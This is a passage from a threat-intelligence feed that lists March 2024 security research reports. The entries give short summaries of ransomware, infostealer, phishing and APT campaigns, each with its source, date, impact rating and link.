Summary:: The article discusses the operations of a new ransomware gang called Donex, specifically their ransomware variant known as ShadowStackRE. The section titled "Donex a new ransomware gang - ShadowStackRE" provides a thorough analysis of the pre-encryption setup, file and directory discovery, and encryption process used by this ransomware. The setup process involves creating a mutex, disabling file system redirection, and obtaining a cryptographic context. The file and directory discovery is carried out through multiple threads and targets specific processes for shutdown. The encryption process utilizes the Windows restart manager API and employs salsa20/chacha20 to encrypt data. The article also mentions the use of a blacklist, whitelist, and extensions in the configuration of the encryptor. The section concludes with a description of the cleanup process, which involves clearing event logs and restarting the system.

Source: https://www.shadowstackre.com/analysis/donex

Intel Source:: Docguard

Intel Name:: Analysis_of_AutoIt_Malware

Date of Scan:: 2024-03-19

Impact:: LOW

Summary:: This article provides a comprehensive analysis of a lnk-based malware, including the process of static and AutoIt deobfuscation. It examines the important fields of the lnk file and identifies a malicious command that downloads and executes an HTA file from a remote server. The HTA file is manually downloaded and analyzed, revealing the use of forfiles.exe and PowerShell. The analysis also uncovers an embedded zip file, which is extracted and examined. A script is used to parse variables and remove unnecessary ones, and a list of IOCs is provided for this specific malware.

Source: https://www.docguard.io/analysis-of-lnk-based-obfuscated-autoit-malware/

Intel Source:: Perception Point

Intel Name:: A_New_Phishing_Attack_That_Deploys_NetSupport_RAT

Date of Scan:: 2024-03-19

Impact:: LOW

Summary:: Israeli researchers at Perception Point have discovered a latest spearphishing effort aimed at American companies with the goal of installing the remote access trojan NetSupport RAT, also known as Operation PhantomBlu. By using OLE (Object Linking and Embedding) template alteration to run malicious code while avoiding detection, the PhantomBlu operation presents a sophisticated exploitation technique that departs from the standard NetSupport RAT distribution methodology.

Source: https://perception-point.io/blog/operation-phantomblu-new-and-evasive-method-delivers-netsupport-rat/

Intel Source:: Fortinet

Intel Name:: RA_World_Ransomware_continued_activity

Date of Scan:: 2024-03-19

Impact:: MEDIUM

Summary:: The blog provides an overview of the RA World ransomware, which encrypts files and steals data before demanding ransom for decryption and not leaking stolen files. The ransomware disables backups and deletes shadow copies to prevent recovery. It encrypts files and adds the .RAWLD extension, and drops a ransom note with contact info. The group operates TOR and non-TOR sites to publish stolen data. The blog covers infection vectors, victims, attack methods, protections, and mitigations.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-ra-world

Intel Source:: ASEC

Intel Name:: CryptoWire_ransomware_distribution

Date of Scan:: 2024-03-18

Impact:: MEDIUM

Summary:: This report provides an analysis of the CryptoWire ransomware, an open-source malware initially spread in 2018 via phishing emails. The malware is written in Autoit and contains the decryption keys within the code, allowing files to be decrypted without payment. It encrypts files and leaves a ransom note demanding payment, but does not require payment due to the presence of the keys.

Source: https://asec.ahnlab.com/ko/62868/

Intel Source:: Hunt.IO

Intel Name:: Open_Directory_Exposes_Phishing_Campaign_Targeting_Google_And_Naver_Credentials

Date of Scan:: 2024-03-18

Impact:: MEDIUM

Summary:: Hunt.IO researchers have observed an ongoing phishing campaign by a possible North Korean threat actor that aims to steal login credentials for Google and Naver. Apart from the numerous fake Google and Naver pages, the public folder that guided us to the finding additionally contains an instance of the open-source malware, Xeno-RAT, and KakaoTalk conversation transcripts between unidentified people talking about cryptocurrency trading.

Source: https://hunt.io/blog/open-directory-exposes-phishing-campaign-targeting-google-and-naver-credentials?utm_source=substack&utm_medium=email

Intel Source:: Geoedge

Intel Name:: ScamClub_Malicious_VAST_Attack

Date of Scan:: 2024-03-18

Impact:: LOW

Summary:: A recent report details how a threat actor known as ScamClub has shifted to using video malvertising and VAST ads to distribute financial scams. The report analyzes ScamClub's tactics, which involve exploiting the VAST protocol to embed malicious code in video ads that fingerprint users and redirect them to scam pages. The report highlights how ScamClub has infiltrated numerous ad platforms to reach a broad audience, with a focus on mobile users. It outlines the technical details of the attack flow, from crafting the malicious script to employing obfuscation techniques and evading detection. The report underscores the need for constant scanning of video assets to safeguard inventory and protect audiences.

Source: https://www.geoedge.com/decoding-scamclubs-malicious-vast-attack

Intel Source:: Securonix Threat Labs

Intel Name:: Examining_Latest_DEEP_GOSU_Attack_Campaign

Date of Scan:: 2024-03-18

Impact:: MEDIUM

Summary:: Securonix researchers have been keeping an eye on a new campaign, identified as DEEP#GOSU, that appears to be connected to the Kimsuky organization. It includes both recycled and newly created code and stagers. Although the Kimsuky organization has previously targeted South Korean victims, it is clear from the tradecraft seen that the group has switched to use a new script-based attack chain that makes use of numerous PowerShell and VBScript stagers in order to covertly infect systems. The attackers can keep an eye on keystrokes, the clipboard, and other session activity through scripts that are used later on.

Source: https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-deepgosu-attack-campaign/

Intel Source:: IBM X-Force

Intel Name:: Hackers_From_APT28_Targeting_Europe_America_Asia_in_Widespread_Phishing_Scheme

Date of Scan:: 2024-03-18

Impact:: MEDIUM

Summary:: IBM X-Force researchers have discovered that the threat actor APT28, which is associated with Russia, is involved in several active phishing attacks. These campaigns use lure documents that mimic government and non-governmental organizations (NGOs) throughout North and South America, Europe, the South Caucasus, Central Asia, and Asia. In addition to potentially actor-generated documents pertaining to finance, key infrastructure, executive engagements, cyber security, maritime security, healthcare, business, and defense industrial production, the unearthed lures comprise a combination of internal and publicly available documents.

Source: https://securityintelligence.com/x-force/itg05-leverages-malware-arsenal/

Intel Source:: Trend Micro

Intel Name:: Malicious_Attacks_on_Global_Government_Institutions

Date of Scan:: 2024-03-18

Impact:: MEDIUM

Summary:: Trend Micro researchers have found that a malicious actor targeting global government institutions. Exploiting compromised government infrastructure, the group employs two distinct malware families known in Earth Krahang's attacks. Their analysis also highlights the broad range of their targets and malicious activities, gleaned from telemetry data and exposed server files.

Source: https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html

Intel Source:: Any.Run

Intel Name:: ObserverStealer_Story_Continues_with_AsukaStealer

Date of Scan:: 2024-03-18

Impact:: LOW

Summary:: AsukaStealer and ObserverStealer are fundamentally similar in that they both use XOR encryption and C2 communication. AsukaStealer distinguishes itself, nevertheless, by forgoing the need for external DLL dependencies for data parsing and decryption in favor of server-side processes, which increase stealth and reduce its digital footprint. The malware developers' intention to improve the stealer based on prior criticisms and the unfavorable user comments are thought to be the driving forces behind the rebranding of ObserverStealer, although with a different moniker.

Source: https://any.run/cybersecurity-blog/asukastealer-malware-analysis/#appendix-1-iocs-7288

Intel Source:: Cyble

Intel Name:: Hackers_Find_Vulnerable_Networks_by_Using_the_Aiohttp_Bug

Date of Scan:: 2024-03-18

Impact:: LOW

Summary:: Researchers at Cyble have discovered that the ransomware actor "ShadowSyndicate" has been seen looking for servers that could be affected by CVE-2024-23334, a directory traversal vulnerability in the aiohttp Python module. Aiohttp is an open-source toolkit designed to manage massively concurrent HTTP requests without the need for conventional thread-based networking. It is built on top of Python's Asyncio asynchronous I/O framework.

Source: https://cyble.com/blog/cgsi-probes-shadowsyndicate-groups-possible-exploitation-of-aiohttp-vulnerability-cve-2024-23334/

Intel Source:: Uptycs

Intel Name:: Mac_malware_analysis_using_osquery

Date of Scan:: 2024-03-18

Impact:: LOW

Summary:: This article discusses the use of osquery, an operating system instrumentation framework, for analyzing malware on macOS systems. It describes how malware can use commands like chown and chmod to gain control and persistence on a system. The article also provides a detailed overview of using osquery for malware analysis, including a comparison with sandboxing solutions and a step-by-step guide for analyzing a specific malware, OSX/Dummy. It concludes by highlighting the benefits of using osquery for dynamic malware analysis on macOS and Linux systems.

Source: https://www.uptycs.com/blog/malware-analysis-using-osquery

Intel Source:: Netskope

Intel Name:: An_Intimidating_Azorult_Campaign_Operated_Via_Google_Sites

Date of Scan:: 2024-03-18

Impact:: LOW

Summary:: Researchers at Netskope have seen an evasive Azorult campaign in action that uses a variety of defense evasion strategies from delivery to execution in order to steal confidential information without drawing attention from the defense. This information thief was initially identified in 2016 and is capable of stealing private data, such as browser history, crypto wallet data, and user credentials.

Source: https://www.netskope.com/blog/from-delivery-to-execution-an-evasive-azorult-campaign-smuggled-through-google-sites

Intel Source:: SOCRadar

Intel Name:: GhostSec_profile

Date of Scan:: 2024-03-15

Impact:: LOW

Summary:: GhostSec’s primary target is online terrorism and violent extremism. GhostSec quickly gained recognition for its approach to confronting extremist groups online. The group even alleges that some of its members were employed by government agencies during an alleged meeting with the US government in those years. GhostSec’s initial goal revolved around the somewhat vague aim of disrupting the online presence and communication of terrorist organizations like ISIS (Islamic State of Iraq and Syria) and Al-Qaeda. However, while the group initially appeared neutral in the Israel-Hamas conflict, they later declared their support for Palestine against what they perceived as Israel’s war crimes.

Source: https://socradar.io/dark-web-profile-ghostsec/

Intel Source:: Cyble

Intel Name:: A_new_stealer_name_Xehook

Date of Scan:: 2024-03-15

Impact:: MEDIUM

Summary:: Cyble analysts discovered a new stealer named Xehook back in January 2024. Xehook Stealer attacks the Windows operating system and is coded in the .Net programming language. The Threat Actor is insisting that this stealer offers dynamic data collection from all Chromium and Gecko-based browsers, supporting over 110 cryptocurrencies and 2FA extensions.

Source: https://cyble.com/blog/xehook-stealer-evolution-of-cinoshis-project-targeting-over-100-cryptocurrencies-and-2fa-extensions/

Intel Source:: Esentire

Intel Name:: An_increase_in_tax_themed_phishing_emails

Date of Scan:: 2024-03-15

Impact:: LOW

Summary:: This month, eSentire has seen a spike in malware delivered through tax-themed phishing emails. Threat Actors are trying to exploit the tax-related communications lures to trick individuals into opening malicious email links, leading to malware infections. The observed phishing campaigns utilize tax-themed lures, including tax documents, tax returns, and IRS letters. These emails often appear to be sent from legitimate tax authorities or financial institutions and include malicious links leading to malware payloads hosted on attacker-controlled infrastructure.

Source: https://www.esentire.com/security-advisories/increase-in-tax-themed-email-lure

Intel Source:: PaloAlto

Intel Name:: A_Fake_Forum_Post_Contamining_GootLoader_Infection

Date of Scan:: 2024-03-15

Impact:: LOW

Summary:: Researchers at Palo Alto have discovered that another fake forum post links to the GootLoader malware. Since at least 2021, this distribution strategy has shown remarkable consistency.

Source: https://www.linkedin.com/posts/unit42_gootloader-timelythreatintel-unit42threatintel-ugcPost-7174049165306527746-aeLl?utm_source=share&utm_medium=member_ios

Intel Source:: Palo Alto

Intel Name:: BunnyLoader_3_analysis

Date of Scan:: 2024-03-15

Impact:: MEDIUM

Summary:: Unit 42 Palo Alto shared their analysis of the new released BunnyLoader 3.0 and on the infrastructure and an overview of its capabilities. BunnyLoader is a constantly developing malware with the capability to steal information, credentials, and cryptocurrency, as well as deliver additional malware to its victims. The threat actor behind this malware is known as “Player” or “Player_Bunny.” The buyer determines what malware BunnyLoader delivers. The author of this malware prohibits its use against Russian systems.

Source: https://unit42.paloaltonetworks.com/analysis-of-bunnyloader-malware/

Intel Source:: Trendmicro

Intel Name:: DarkGate_Operators_Exploit_Microsoft_Windows_SmartScreen_Bypass

Date of Scan:: 2024-03-15

Impact:: MEDIUM

Summary:: The Zero Day Initiative tracked a DarkGate campaign which was observed last January 2024 where DarkGate operators exploited CVE-2024-21412 and linked to the Water Hydra APT zero-day analysis.

Source: https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html

Intel Source:: Checkpoint

Intel Name:: DocLink_Defender_prevention_technology

Date of Scan:: 2024-03-15

Impact:: LOW

Summary:: DocLink Defender leverages the latest in analytical technology to intercept and neutralize malicious documents instantly.

Source: https://blog.checkpoint.com/security/shield-your-documents-introducing-doclink-defender-for-real-time-malware-blockade/

Intel Source:: Cybereason

Intel Name:: The_ActiveMQ_Vulnerability_Is_Being_Exploited_by_Messengers

Date of Scan:: 2024-03-15

Impact:: LOW

Summary:: Researchers from Cybereason have looked into an event on a Linux server where malicious shell (bash) executions occurred via a Java process that was utilizing Apache ActiveMQ. An open-source message broker called ActiveMQ is used to facilitate communication across disparate servers that may be running different operating systems or have different languages.

Source: https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability

Intel Source:: Zscaler

Intel Name:: Roblox_Users_Targeted_with_Tweaks_Malware

Date of Scan:: 2024-03-15

Impact:: LOW

Summary:: Zscaler’s Threat researchers observed a new attack campaign spreading an infostealer called Tweaks that targets Roblox users. Attackers are exploiting platforms, like YouTube and Discord, to distribute Tweaks to Roblox users, by evading detection by web filter block lists that typically block known malicious servers. Attackers share malicious files disguised as Frames Per Second (FPS) optimization packages with users and, in turn, users infect their systems with Tweaks malware.

Source: https://www.zscaler.com/blogs/security-research/tweaks-stealer-targets-roblox-users-through-youtube-and-discord

Intel Source:: Securelist

Intel Name:: The_Chinese_users_targeted_by_infected_text_editors

Date of Scan:: 2024-03-15

Impact:: LOW

Summary:: Securelist analysts discovered two related cases where modified versions of popular text editors were distributed in this system: in the first case, the malicious resource appeared in the advertisement section; in the second case, at the top of the search results.

Source: https://securelist.com/trojanized-text-editor-apps/112167/

Intel Source:: F1tym1

Intel Name:: Online_Scam_campaign

Date of Scan:: 2024-03-15

Impact:: LOW

Summary:: Scammers aim for mobile phones because they are the most widespread, most utilized devices. They use subterfuge and scams to steal our money, information, and permissions.

Source: https://f1tym1.com/2024/03/14/online-scam-scams-encountered-on-my-phone/

Intel Source:: CYFIRMA Research

Intel Name:: Exdefacer_Turns_Seller_of_Discord_Stealer_aka_Nikki_Stealer

Date of Scan:: 2024-03-15

Impact:: LOW

Summary:: Researchers from CYFIRMA have discovered that a person who was formerly well-known for vandalizing websites has switched to offering a Discord stealer created using the Electron framework, named Nikki Stealer. The latest developments in Nikki Stealer v9 demonstrate how quickly this tool is evolving. Analysis of the Nikki Stealer Discord server's conversation logs reveals that users are complaining about the device's poor detection rate. Additionally, the stealer's developer can be seen talking candidly about drug use in the conversation. Remarkable parallels have been noted between Fewer and Nikki Stealer.

Source: https://media.licdn.com/dms/document/media/D561FAQEHMA1974p3pA/feedshare-document-pdf-analyzed/0/1710500504964?e=1711584000&v=beta&t=eC173BZYgGbUF25DLnBY-AgSTtSwfsTbN2aFuO9xOgE

Intel Source:: Cisco Talos

Intel Name:: Threat_actors_leverage_document_for_credential_and_session_token_theft

Date of Scan:: 2024-03-15

Impact:: LOW

Summary:: Cisco Talos Incident Response (Talos IR) has observed the ongoing use of legitimate digital document publishing (DDP) sites for phishing, credential theft, and session token theft during recent incident response and threat intelligence engagements.

Source: https://blog.talosintelligence.com/threat-actors-leveraging-document-publishing-sites/

Intel Source:: Malwarebytes

Intel Name:: Multiple_Ongoing_Malvertising_Activities_Used_to_Distribute_FakeBat

Date of Scan:: 2024-03-13

Impact:: LOW

Summary:: FakeBat malvertising campaigns using two kinds of ad URLs. They were misusing URL/analytics shorteners, which are perfect for cloaking, as seen in past malvertising efforts. This technique gives a threat actor the ability to select a "good" or "bad" destination URL according to their own predetermined criteria (such as the IP address, user agent, and time of day).

Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/03/fakebat-delivered-via-several-active-malvertising-campaigns

Intel Source:: Securelist

Intel Name:: Malicious_Advertising_Using_Search_Engines

Date of Scan:: 2024-03-13

Impact:: LOW

Summary:: Researchers at Securelist have noticed a rise in the quantity of malicious operations that disseminate and distribute malware via Google Advertising. Rhadamanthys and RedLine, two distinct stealers, were misusing the search engine promotion scheme to infect victims' computers with malicious payloads. They appear to employ the same method of imitating a website connected to popular programs like Blender 3D and Notepad++.

Source: https://securelist.com/malvertising-through-search-engines/108996/

Intel Source:: Fortinet

Intel Name:: Attackers_Using_GitHub_and_AWS_to_Spread_RATs_Through_Phishing_Campaigns

Date of Scan:: 2024-03-13

Impact:: LOW

Summary:: A recent phishing effort is discovered, in which attackers exploit publicly accessible platforms like GitHub and Amazon web servers to store malware, which is subsequently used via email to initiate an attack campaign and take over the newly compromised systems. According to FortiGuard Labs, the email tricks recipients into opening a dangerous, high-severity Java downloader that tries to disseminate the well-known STRRAT RAT and a brand-new VCURMS remote access trojan (RAT). Every platform that has Java installed is susceptible, and it can affect any kind of business.

Source: https://www.fortinet.com/blog/threat-research/vcurms-a-simple-and-functional-weapon

Intel Source:: G DATA

Intel Name:: RisePro_Stealer_Is_Aiming_at_Github_Users

Date of Scan:: 2024-03-13

Impact:: MEDIUM

Summary:: Researchers from G DATA Cyber Defense have found at least 13 of these repositories, which are part of a RisePro stealer campaign that the threat actors have dubbed "gitgub." The repositories have a similar appearance and offer free cracked software in a README.md file. On Github, circles in the colors green and red are frequently used to indicate the status of automated builds. Four green Unicode circles that appear to show a status along with the current date and give the impression of validity and recentness were inserted by Gitgub threat actors to their README.md file.

Source: https://www.gdatasoftware.com/blog/2024/03/37885-risepro-stealer-campaign-github

Intel Source:: ISC.SANS

Intel Name:: Decoding_Malicious_Scripts_Using_ChatGPT

Date of Scan:: 2024-03-13

Impact:: LOW

Summary:: Researchers from INC.SANS have discovered a malicious Python script that has a low VirusTotal score of 2/61. By the time they looked at it, it had been obfuscated. All of the intriguing strings were compressed, Base64-encoded, and hex-encoded.

Source: https://isc.sans.edu/diary/rss/30740

Intel Source:: Splunk

Intel Name:: SnakeKeylogger_loader_technics_and_tactics

Date of Scan:: 2024-03-12

Impact:: MEDIUM

Summary:: The Splunk Threat Research Team provided in their blog deep insights and details to share with security analysts and blue teamers on how to defend and be aware of these suspicious activities and tactics.

Source: https://www.splunk.com/en_us/blog/security/under-the-hood-of-snakekeylogger-analyzing-its-loader-and-its-tactics-techniques-and-procedures.html

Intel Source:: SOC Radar

Intel Name:: A_Dark_Web_Profile_of_Meow_Ransomware

Date of Scan:: 2024-03-12

Impact:: LOW

Summary:: Four ransomware strains that are descended from Conti's ransomware strain that was leaked were found in late 2022. The Meow ransomware was one of them. This crypto-ransomware was detected operating between the end of August and the first part of September 2022, and it continued to do so until February 2023. They stopped operating in March 2023 after a free decryptor for the Meow ransomware was made available. There is still an active organization called Meow that entered 2024 rather quickly and has already claimed nine victims. It appears that this gang uses the RaaS paradigm; yet, in March 2024 alone, three victims were reported, and the institutions they target are not insignificant ones.

Source: https://socradar.io/dark-web-profile-meow-ransomware/

Intel Source:: Reversing Labs

Intel Name:: Attacks_on_Crypto_Wallet_Recovery_Passwords_by_Malicious_PyPI_Packages

Date of Scan:: 2024-03-12

Impact:: LOW

Summary:: Researchers at ReversingLabs have discovered a brand-new harmful campaign that consists of seven distinct open-source packages on the Python Package Index (PyPI) with 19 versions, the oldest of which was released in December 2022. The campaign aims to steal mnemonic phrases that are used to recover crypto wallets that have been lost or destroyed.

Source: https://www.reversinglabs.com/blog/bipclip-malicious-pypi-packages-target-crypto-wallet-recovery-passwords

Intel Source:: Symantec

Intel Name:: Operators_Adapt_to_Disruption_as_Ransomware_Attacks_Rise

Date of Scan:: 2024-03-12

Impact:: LOW

Summary:: Even though the number of attacks that ransomware operators claim to have carried out dropped by little more than 20% in the fourth quarter of 2023, ransomware activity is still on the rise. Attackers have continuously improved their strategies, shown that they can react quickly to disruptions, and discovered new means of infecting victims.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-attacks-exploits

Intel Source:: ASEC

Intel Name:: Infostealer_Posing_as_Installer_For_Adobe_Reader

Date of Scan:: 2024-03-12

Impact:: LOW

Summary:: Researchers from ASEC have found that an infostealer that poses as the installation for Adobe Reader is being distributed. The file is being distributed by the threat actor in PDF format, requesting that people download and execute it.

Source: https://asec.ahnlab.com/en/62853/

Intel Source:: Darktrace

Intel Name:: A_New_Phishing_Attack_Targeting_Dropbox

Date of Scan:: 2024-03-11

Impact:: LOW

Summary:: Darktrace researchers have alerted users to a well-known new phishing and malspam campaign that uses Dropbox emails to target users of well-known Software-as-a-Service (SaaS) platforms. According to recent research, a fresh phishing attempt targeting Dropbox has been effective in getting over MFA (multi-factor authentication) safeguards. By tricking users into downloading malware, this hack seeks to reveal login information.

Source: https://darktrace.com/blog/legitimate-services-malicious-intentions-getting-the-drop-on-phishing-attacks-abusing-dropbox

Intel Source:: ASEC

Intel Name:: Spread_of_Malware_MSIX_Pretended_to_Be_Notion_Installer

Date of Scan:: 2024-03-11

Impact:: LOW

Summary:: The Notion installation is actually a ruse to transmit MSIX malware. The distribution website bears a resemblance to the main Notion homepage. When the user clicks the download button, a file called "Notion-x86.msix" is downloaded. This file, a Windows app installation, has a legitimate certificate used to certify it. When the user runs the file, the pop-up appears. When you click the Install button, malware infects Notion and installs on your computer.

Source: https://asec.ahnlab.com/en/62815/

Intel Source:: Sucuri

Intel Name:: Malicious_Campagin_Exploiting_Stored_XSS_in_Popup_Builder

Date of Scan:: 2024-03-11

Impact:: LOW

Summary:: The malicious code that can be found in the Custom JS or CSS part of the WordPress admin interface which is internally saved in the wp_postmeta database table is injected by the attackers using a known vulnerability in the Popup Builder WordPress plugin.

Source: https://blog.sucuri.net/2024/03/new-malware-campaign-found-exploiting-stored-xss-in-popup-builder-4-2-3.html?web_view=true

Intel Source:: GuidePoint Security

Intel Name:: The_TeamCity_Exploit_Leads_BianLian_to_Embrace_PowerShell

Date of Scan:: 2024-03-11

Impact:: MEDIUM

Summary:: Researchers at GuidePoint have discovered malicious activities on a client's network. After locating a weak point in the TeamCity server, the threat actor used CVE-2024-27198 / CVE-2023-42793 to gain initial access to the system. Within TeamCity, the threat actor created users and executed malicious commands using the service account associated with the TeamCity product.

Source: https://www.guidepointsecurity.com/blog/bianlian-gos-for-powershell-after-teamcity-exploitation/

Intel Source:: Inquest

Intel Name:: An_emerging_information_stealing_Project_trojan

Date of Scan:: 2024-03-08

Impact:: LOW

Summary:: The article discusses the emergence of a new trojan called Planet Stealer, which is designed to steal sensitive information from victim hosts. It is written in Go and is being sold in underground forums. This type of information-stealing malware is in high demand among financially motivated criminals, indicating a thriving market for such tools.

Source: https://inquest.net/blog/around-we-go-planet-stealer-emerges/

Intel Source:: Security Intelligence

Intel Name:: New_Fakext_Malware_Targeting_Latin_American_Banks

Date of Scan:: 2024-03-08

Impact:: LOW

Summary:: IBM security researchers have discovered a new, widely distributed malware called Fakext which leverages a malicious Edge plugin to launch web-injection and man-in-the-browser attacks. Over 35,000 infected sessions have been seen by researchers since November 2023; the majority of these sessions originate from Latin America (LATAM), with a lesser proportion from North America and Europe.

Source: https://securityintelligence.com/posts/fakext-targeting-latin-american-banks/

Intel Source:: Cisco Talos

Intel Name:: Navigating_the_tax_season_global_surge

Date of Scan:: 2024-03-08

Impact:: MEDIUM

Summary:: As tax deadlines approach globally, individuals and businesses must be vigilant against an increase in tax-related scams and ransomware attacks. Scammers exploit this period to launch sophisticated phishing campaigns, aiming to steal personal information, financial data, or directly extract money through deceit. Notably, the collaboration between ransomware groups GhostSec and Stormous has marked a significant rise in ransomware threats, including the deployment of the STMX_GhostLocker ransomware-as-a-service.

Source: https://blog.talosintelligence.com/threat-source-newsletter-march-7-2024/

Intel Source:: ESET

Intel Name:: Compromised_Supply_Chain_and_Sophisticated_Toolkit_Exposed

Date of Scan:: 2024-03-08

Impact:: LOW

Summary:: ESET researchers identified a cyberespionage campaign directed at Tibetans across various regions. The threat actors deployed downloaders, droppers, and backdoors, such as the exclusive MgBot and the recently added Nightdoor, targeting networks in East Asia. Additionally, the attackers compromised the supply chain of a Tibetan language translation app developer.

Source: https://www.welivesecurity.com/en/eset-research/evasive-panda-leverages-monlam-festival-target-tibetans/

Intel Source:: Checkpoint

Intel Name:: Magnet_Goblin_Uses_1_Day_Vulnerabilities_to_Target_Publicly_Facing_Servers

Date of Scan:: 2024-03-08

Impact:: MEDIUM

Summary:: A financially driven threat actor, Magnet Goblin swiftly embraces and makes use of one-day vulnerabilities in services that are accessible to the public as a means of spreading infection. In one instance using Ivanti Connect Secure VPN (CVE-2024-21887), the exploit was added to the group's toolkit in less than a day following the publication of a proof of concept.

Source: https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/

Intel Source:: Zscaler

Intel Name:: Beware_of_Malware_Delivering_Spoofing_Websites

Date of Scan:: 2024-03-07

Impact:: LOW

Summary:: Researchers at Zscaler have identified a threat actor that creates fake websites for Zoom, Google Meet, and Skype in order to disseminate malware. The threat actor infects Windows users with NjRAT and DCRat and distributes SpyNote RAT to Android users. By using shared web hosting, the attacker was able to host all of these fake online meeting sites under a single IP address. As seen by all of the numbers below, the fake websites were all in Russian. Furthermore, the attackers used URLs that closely matched the real websites to host these fictitious ones.

Source: https://www.zscaler.com/blogs/security-research/android-and-windows-rats-distributed-online-meeting-lures

Intel Source:: Intel-Ops

Intel Name:: Examining_Infrastructure_That_8Base_Using_in_Relation_to_Phobos_Ransomware

Date of Scan:: 2024-03-06

Impact:: MEDIUM

Summary:: Intel-Ops is actively monitoring infrastructure that has been determined to be a part of the 8Base Ransomware organization, which is responsible for operating the Phobos ransomware. A dispersed group of affiliates with extremely similar TTPs, along with several variants (Eking, Eight, Elbie, Devos, and Faust), make Phobos an estimated Ransomware-as-a-Service (RaaS).

Source: https://medium.com/@Intel_Ops/phobos-ransomware-analysing-associated-infrastructure-used-by-8base-646560302a8d

Intel Source:: Cado Security

Intel Name:: The_Spinning_Yarn_Linux_Malware_Campaign_Targeting_Misconfigured_Servers

Date of Scan:: 2024-03-06

Impact:: MEDIUM

Summary:: Researchers at Cado Security Labs have discovered a new malware campaign that targets misconfigured servers that host web-facing services including Redis, Docker, Apache Hadoop YARN, and Confluence. The campaign makes use of several distinct and unreported payloads, such as four Golang binaries, which are instruments for automatically locating and infecting sites that are hosting the aforementioned services. By utilizing common misconfigurations and an n-day vulnerability, the attackers use these tools to generate exploit code that allows them to conduct Remote Code Execution (RCE) attacks and infect new hosts.

Source: https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/

Intel Source:: Qurium

Intel Name:: The_fake_video_connected_to_Russian_cyberscam_network

Date of Scan:: 2024-03-06

Impact:: MEDIUM

Summary:: A deep fake video of Maria Ressa promoting a crypto-currency scam was released in early February 2024. The video was hosted on a domain that contained links to a Russian cyberscam network. Metadata analysis revealed Russian influence behind the creation of the deep fake and fake news articles designed to discredit Ressa.

Source: https://www.qurium.org/alerts/philippines/deep-fake-video-of-maria-ressa-connected-to-cyberscam-network-in-russia/

Intel Source:: Cyfirma Research

Intel Name:: New_Lighter_Ransomware_Targeting_Individuals_in_UK_and_US

Date of Scan:: 2024-03-06

Impact:: MEDIUM

Summary:: Researchers at Cyfirma have identified a brand-new malware developed by the Lighter Extortion group, which they have named Lighter malware. An uncommon instance of triple extortion, in which the threat actors make threats against the victim if the ransom is not paid in addition to encrypting the data and exfiltrating it. The threat actors are probably going to target people in the US and the UK based on the ransom note.

Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_our-researcher-kaush%C3%ADk-pa%C5%82-discovered-a-new-activity-7171078602367594496-4w2G?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Intel Source:: Proofpoint

Intel Name:: TA4903_Using_Phishing_Attack_on_US_Government_and_Small_Businesses

Date of Scan:: 2024-03-06

Impact:: MEDIUM

Summary:: Researchers at Proofpoint have noticed a rise in credential phishing and fraud efforts in the middle of 2023 and early 2024 that use themes other than TA4903. The performer started parodying small and medium-sized enterprises (SMBs) across a range of sectors, including as manufacturing, energy, finance, food and beverage, and construction. The pace of BEC themes has also increased, according to Proofpoint, with themes like "cyberattacks" being used to entice victims to divulge their banking and payment information.

Source: https://www.proofpoint.com/us/blog/threat-insight/ta4903-actor-spoofs-us-government-small-businesses-phishing-bec-bids

Intel Source:: Sophos, GitHub

Intel Name:: Attackers_still_abusing_Terminator_tool_and_variants

Date of Scan:: 2024-03-06

Impact:: MEDIUM

Summary:: A threat intelligence report describes that threat actors continue to leverage vulnerable drivers like Zemana Anti-Logger and Anti-Malware to disable security products through Bring Your Own Vulnerable Driver attacks. Variants of the Terminator tool that exploits these drivers are still observed in the wild. The actors use the drivers for lateral movement and privilege escalation as part of ransomware campaigns targeting healthcare and other industries.

Source: https://news.sophos.com/en-us/2024/03/04/itll-be-back-attackers-still-abusing-terminator-tool-and-variants/ https://github.com/sophoslabs/IoCs/blob/master/Zemana-driver-IoCs.csv

Intel Source:: Harfanglab

Intel Name:: A_Thorough_Examination_of_I_SOONs_Commercial_Offering

Date of Scan:: 2024-03-06

Impact:: LOW

Summary:: I-Soon's business proposal indicates that processing gathered data is the primary problem, not initially failing to meet goals. Their products classify and sort stolen documents with the aid of deep learning. The business seems to have problems finding malware and usually uses rudimentary techniques (phishing, for example). But in the last ten years, they have violated numerous strategic targets all around the world.

Source: https://harfanglab.io/en/insidethelab/isoon-leak-analysis/

Intel Source:: Sekoia

Intel Name:: The_DDoSia_Project_of_NoName057_16

Date of Scan:: 2024-03-06

Impact:: LOW

Summary:: Since the start of the conflict in Ukraine, a number of organizations dubbed "nationalist hacktivists" have surfaced, mostly on the Russian side, to fuel hostilities between Moscow and Kyiv. Of these organizations, the pro-Russian group NoName057(16) has gained notoriety for starting Project DDoSia, a group effort to launch massive distributed denial-of-service (DDoS) attacks against organizations (private companies, government agencies, and state institutions) that are part of nations that back Ukraine, primarily NATO members.

Source: https://blog.sekoia.io/noname05716-ddosia-project-2024-updates-and-behavioural-shifts

Intel Source:: Trend Micro

Intel Name:: Diving_Deep_into_Earth_Kapre_Group

Date of Scan:: 2024-03-06

Impact:: LOW

Summary:: Researchers at Trend Micro have investigated Earth Kapre, also known as RedCurl and Red Wolf. The successful investigation that revealed Earth Kapre's intrusion sets used in a recent event, as well as the way the team used threat intelligence to link the evidence that was taken out to the cyberespionage threat organization.

Source: https://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html

Intel Source:: Sucuri

Intel Name:: Distributed_WordPress_Brute_Force_Attack

Date of Scan:: 2024-03-06

Impact:: MEDIUM

